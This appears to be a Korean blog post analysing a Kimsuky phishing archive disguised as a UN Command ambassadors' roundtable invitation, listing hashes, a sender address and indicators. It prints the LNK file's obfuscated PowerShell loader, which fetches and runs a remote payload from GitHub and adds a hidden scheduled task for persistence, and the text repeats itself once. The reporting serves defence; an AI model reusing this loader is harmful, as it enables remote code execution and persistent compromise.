북한 김수키(Kimsuky) 한미 군사 동맹 주제로 만든 악성코드-Update Schedule_INVITATION - 250625 UNC Ambassador_s Roundtable.zip(2025.6.11)
Contents
오늘은 북한 김수키(Kimsuky) 조직이 만든 악성코드인 Update Schedule_INVITATION - 250625 UNC Ambassador_s Roundtable.zip에 대해 글을 적어 보겠습니다.
해당 악성코드를 보면 업데이트 일정_초대 - 250625 UNC 대사_원탁회의(Update Schedule_INVITATION - 250625 UNC Ambassador_s Roundtable)이라는것이 보이는데 유엔군사령부 (UNC)인것 처럼 해서 공격을 한 것으로 추측됩니다.
일단 해당 악성코드인 압축 파일에서는 비밀번호가 걸려 있는데 해당 비밀번호를 풀고 압축 파일을 열면 pdf 인 것처럼 위장된 파일을 볼 수가 있습니다.
파일명:Update Schedule_INVITATION - 250625 UNC Ambassador's Roundtable.zip
사이즈:1 MB
MD5:488570af25f908e907c9732aae632b0f
SHA-1:5648d0e3c8baa6ae955fa5441ab8fdbbfcb39f88
SHA-256:9c5964753f8092a98f414a97cfb02cbe2692a02bea0d1b601ff205282fbf8a62
이며 2025년 6월 10일 장효정 에릭 (Chang Hyo Chong Eric)이 보낸 것으로 추정되는 이메일이 남유럽 외교부에 발송되었습니다.
해당 이메일 보낸 사람의 이메일 주소는 landf5503@gmail(.)com 이며 남부 유럽 외무부로 보낸 것입니다.
다시 압축을 해제한 파일의 해쉬값은 다음과 같습니다.
파일명:Update Schedule_INVITATION - 250625 UNC Ambassador's Roundtable.pdf.lnk
사이즈:1 MB
MD5:bca4cac80c436e813d93eba1b25257d0
SHA-1:96ad2f7ad615d80fc37678ba3e4193caf7cc807b
SHA-256:9f5460850a3b5b53568cd450e83406927776833778a8eb24955bcebdf9849321
악성코드에 포함된 코드
StringData
{
namestring: Type: Hangul Document
Size: 2.84 KB
Date modified: 10/20/2023 11:23
relativepath: not present
workingdir: not present
commandlinearguments"$bas2 = \"JGhoaD1Kb2luLVBhdGggKFtTeXN0Z(d)ldFRlbXBQYXRoKCkpICJVcGRh
dGUgU2NoZWR1bGVfSU5WSVRBVElPTiAtIDI1MDYyNSBVTkMgQW1iYXNzYWRvcidzIFJvdW5kdGFibGUucGRmIjsk
dGtmPSJnaCIrInBfOSIrImYiKyJ4eFNKIi(si)TSIrIk0iKyJ2SSIrImhkVyIrIklLdiIrInR6WSIrInh3NiIrIkx
YIisiakVpIisiRk5qIisiNFVVIisidHYiKyJYIjskYnN0cj0iaCIrInQiKyJ0IisicCIrInMiKyI6IisiLyIrIi8iKyJyI(i)siYSIrIncuZ2l0aCIrInVidXNlIisicmNvbiIrInRlIisibnQuIisiY29tIisiL2wiKyJhbmRqIisiaG9u
LyIrInRva3VsIisiYSIrIi9tYWkiKyJuIisiLyI7JHJzdHI9JGJzdHIrInRtcC5wZ(G)YiOyRocnMgPSBAe0F1dGhvcm
l6YXRpb249InRva2VuICR0a2YiO3NyamlkYz0iZHNnaGprZ2VramhnZWdlZ2VnciI7QWNjZXB0PSJhcHBsaWNhdGlv
bi92bmQuZ2l0aHViLnYzLnJhdyJ9O0lud(m)9rZS1XZWJSZXF1ZXN0IC1VcmkgJHJzdHIgLUhlYWRlcnMgJGhycyAtT3
V0RmlsZSAkaGhoOyYgJGhoaDskcHBwID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ci
A9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7ICRic3A9IicrJGJzdHIrJ29meC50eH
QiOyRoc3A9QHtBdXRob3JpemF0aW9uPSJ0b2tlbiAnKyR0a2YrJyI(Y)z0iaGRqZ0VSRXJpdDc4M3RpdSI7QWNjZXB0P
SJhcHBsaWNhdGlvbi92bmQuZ2l0aHViLnYzLnJhdyJ9O0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJGJzcCAtSGVhZGVyc
yAkaHNwIC1PdXRGaWxl(I)CRhYWE7JiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTsnOyAkc3RyIHw
gT3V0LUZpbGUgLUZpbGVQYXRoICRwcHAgLUVuY29kaW5nIFVURjg7ICRhY3Rpb24gPSBOZXctU2No(Z)WR1bGVkVGFza
0FjdGlvbiAtRXhlY3V0ZSAnUG93ZXJTaGVsbC5leGUnIC1Bcmd1bWVudCAnLVdpbmRvd1N0eWxlIEhpZGRlbiAtbm9wI
CAtTm9uSW50ZXJhY3RpdmUgLU5vUHJvZmlsZSAtRXhl(Y)3V0aW9uUG9saWN5IEJ5cGFzcyAtQ29tbWFuZCAiJiB7JGF
iYyA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSBcImNocm9tZS5wczFcI(j)sgJiAkYWJjO30iJzsgJHRyaWdnZXIgP
SBOZXctU2NoZWR1bGVkVGFza1RyaWdnZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpd
GlvbkludGVydmFsIChOZXctV(G)ltZVNwYW4gLU1pbnV0ZXMgMzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGF
za1NldHRpbmdzU2V0IC1IaWRkZW47IFJlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLVRhc2tOYW1lICJNaWNyb(3)JmdGVyd
GVndWVzb2Z0bGVVcGRhdGVtYXJsZXJw(R)ic3RyKyJvbmYudHh0IjtJbnZva2UtV2ViUmVxdWVzdCAtVXJpICRyc3RyI
C1IZWFkZXJzICRocnMgLU91dEZpbGUgJGFhYTsmI(C)RhYWE7IF(J0lbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlO
w==\";$bsts=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";$bas2=$bas2
(.)TrimEnd('=');$btks=New-Object System(.)Collections(.)Generic.List[Byte];for($i=0;$i -lt $
bas2.Length;$i+=4){$yhsd=$bas2.Su(b)string($i,[Math]::Min(4,$bas2.Length-$i));$vds=0;$yhs(d)
Len = $yhsd.Length;foreach($c in $yhsd.ToCharArray()){$vds=($vds -shl (6)) -bor $b(s)ts.Inde
xOf($c);};for ($j=16; $j -ge 0;$j -= 8){if((($i*6)/8)+(3-$j/8) -lt (($bas2.Length*6)/8)){$bt
ks.Add([byte](($vds -s(h)r $j) -band 0xFF));}}};$dcdsg1=[System.Text.Encoding]::UTF8.GetStri
ng($(b)tks.ToArray());$ct(y)67sx1=[System.IO.Path]::GetTempPath();$esiu231=\"main.ps1\";$dsv
u1=Join-Path $cty67sx1 $esiu231;$dcdsg1|Ou(t-)File …
해당 악성코드를 보면 업데이트 일정_초대 - 250625 UNC 대사_원탁회의(Update Schedule_INVITATION - 250625 UNC Ambassador_s Roundtable)이라는것이 보이는데 유엔군사령부 (UNC)인것 처럼 해서 공격을 한 것으로 추측됩니다.
일단 해당 악성코드인 압축 파일에서는 비밀번호가 걸려 있는데 해당 비밀번호를 풀고 압축 파일을 열면 pdf 인 것처럼 위장된 파일을 볼 수가 있습니다.
파일명:Update Schedule_INVITATION - 250625 UNC Ambassador's Roundtable.zip
사이즈:1 MB
MD5:488570af25f908e907c9732aae632b0f
SHA-1:5648d0e3c8baa6ae955fa5441ab8fdbbfcb39f88
SHA-256:9c5964753f8092a98f414a97cfb02cbe2692a02bea0d1b601ff205282fbf8a62
이며 2025년 6월 10일 장효정 에릭 (Chang Hyo Chong Eric)이 보낸 것으로 추정되는 이메일이 남유럽 외교부에 발송되었습니다.
해당 이메일 보낸 사람의 이메일 주소는 landf5503@gmail(.)com 이며 남부 유럽 외무부로 보낸 것입니다.
다시 압축을 해제한 파일의 해쉬값은 다음과 같습니다.
파일명:Update Schedule_INVITATION - 250625 UNC Ambassador's Roundtable.pdf.lnk
사이즈:1 MB
MD5:bca4cac80c436e813d93eba1b25257d0
SHA-1:96ad2f7ad615d80fc37678ba3e4193caf7cc807b
SHA-256:9f5460850a3b5b53568cd450e83406927776833778a8eb24955bcebdf9849321
악성코드에 포함된 코드
StringData
{
namestring: Type: Hangul Document
Size: 2.84 KB
Date modified: 10/20/2023 11:23
relativepath: not present
workingdir: not present
commandlinearguments"$bas2 = \"JGhoaD1Kb2luLVBhdGggKFtTeXN0Z(d)ldFRlbXBQYXRoKCkpICJVcGRh
dGUgU2NoZWR1bGVfSU5WSVRBVElPTiAtIDI1MDYyNSBVTkMgQW1iYXNzYWRvcidzIFJvdW5kdGFibGUucGRmIjsk
dGtmPSJnaCIrInBfOSIrImYiKyJ4eFNKIi(si)TSIrIk0iKyJ2SSIrImhkVyIrIklLdiIrInR6WSIrInh3NiIrIkx
YIisiakVpIisiRk5qIisiNFVVIisidHYiKyJYIjskYnN0cj0iaCIrInQiKyJ0IisicCIrInMiKyI6IisiLyIrIi8iKyJyI(i)siYSIrIncuZ2l0aCIrInVidXNlIisicmNvbiIrInRlIisibnQuIisiY29tIisiL2wiKyJhbmRqIisiaG9u
LyIrInRva3VsIisiYSIrIi9tYWkiKyJuIisiLyI7JHJzdHI9JGJzdHIrInRtcC5wZ(G)YiOyRocnMgPSBAe0F1dGhvcm
l6YXRpb249InRva2VuICR0a2YiO3NyamlkYz0iZHNnaGprZ2VramhnZWdlZ2VnciI7QWNjZXB0PSJhcHBsaWNhdGlv
bi92bmQuZ2l0aHViLnYzLnJhdyJ9O0lud(m)9rZS1XZWJSZXF1ZXN0IC1VcmkgJHJzdHIgLUhlYWRlcnMgJGhycyAtT3
V0RmlsZSAkaGhoOyYgJGhoaDskcHBwID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ci
A9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7ICRic3A9IicrJGJzdHIrJ29meC50eH
QiOyRoc3A9QHtBdXRob3JpemF0aW9uPSJ0b2tlbiAnKyR0a2YrJyI(Y)z0iaGRqZ0VSRXJpdDc4M3RpdSI7QWNjZXB0P
SJhcHBsaWNhdGlvbi92bmQuZ2l0aHViLnYzLnJhdyJ9O0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJGJzcCAtSGVhZGVyc
yAkaHNwIC1PdXRGaWxl(I)CRhYWE7JiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTsnOyAkc3RyIHw
gT3V0LUZpbGUgLUZpbGVQYXRoICRwcHAgLUVuY29kaW5nIFVURjg7ICRhY3Rpb24gPSBOZXctU2No(Z)WR1bGVkVGFza
0FjdGlvbiAtRXhlY3V0ZSAnUG93ZXJTaGVsbC5leGUnIC1Bcmd1bWVudCAnLVdpbmRvd1N0eWxlIEhpZGRlbiAtbm9wI
CAtTm9uSW50ZXJhY3RpdmUgLU5vUHJvZmlsZSAtRXhl(Y)3V0aW9uUG9saWN5IEJ5cGFzcyAtQ29tbWFuZCAiJiB7JGF
iYyA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSBcImNocm9tZS5wczFcI(j)sgJiAkYWJjO30iJzsgJHRyaWdnZXIgP
SBOZXctU2NoZWR1bGVkVGFza1RyaWdnZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpd
GlvbkludGVydmFsIChOZXctV(G)ltZVNwYW4gLU1pbnV0ZXMgMzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGF
za1NldHRpbmdzU2V0IC1IaWRkZW47IFJlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLVRhc2tOYW1lICJNaWNyb(3)JmdGVyd
GVndWVzb2Z0bGVVcGRhdGVtYXJsZXJw(R)ic3RyKyJvbmYudHh0IjtJbnZva2UtV2ViUmVxdWVzdCAtVXJpICRyc3RyI
C1IZWFkZXJzICRocnMgLU91dEZpbGUgJGFhYTsmI(C)RhYWE7IF(J0lbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlO
w==\";$bsts=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";$bas2=$bas2
(.)TrimEnd('=');$btks=New-Object System(.)Collections(.)Generic.List[Byte];for($i=0;$i -lt $
bas2.Length;$i+=4){$yhsd=$bas2.Su(b)string($i,[Math]::Min(4,$bas2.Length-$i));$vds=0;$yhs(d)
Len = $yhsd.Length;foreach($c in $yhsd.ToCharArray()){$vds=($vds -shl (6)) -bor $b(s)ts.Inde
xOf($c);};for ($j=16; $j -ge 0;$j -= 8){if((($i*6)/8)+(3-$j/8) -lt (($bas2.Length*6)/8)){$bt
ks.Add([byte](($vds -s(h)r $j) -band 0xFF));}}};$dcdsg1=[System.Text.Encoding]::UTF8.GetStri
ng($(b)tks.ToArray());$ct(y)67sx1=[System.IO.Path]::GetTempPath();$esiu231=\"main.ps1\";$dsv
u1=Join-Path $cty67sx1 $esiu231;$dcdsg1|Ou(t-)File …
IoC
[email protected]
5648d0e3c8baa6ae955fa5441ab8fdbbfcb39f88
9f5460850a3b5b53568cd450e83406927776833778a8eb24955bcebdf9849321
488570af25f908e907c9732aae632b0f
9c5964753f8092a98f414a97cfb02cbe2692a02bea0d1b601ff205282fbf8a62
bca4cac80c436e813d93eba1b25257d0
96ad2f7ad615d80fc37678ba3e4193caf7cc807b
5648d0e3c8baa6ae955fa5441ab8fdbbfcb39f88
9f5460850a3b5b53568cd450e83406927776833778a8eb24955bcebdf9849321
488570af25f908e907c9732aae632b0f
9c5964753f8092a98f414a97cfb02cbe2692a02bea0d1b601ff205282fbf8a62
bca4cac80c436e813d93eba1b25257d0
96ad2f7ad615d80fc37678ba3e4193caf7cc807b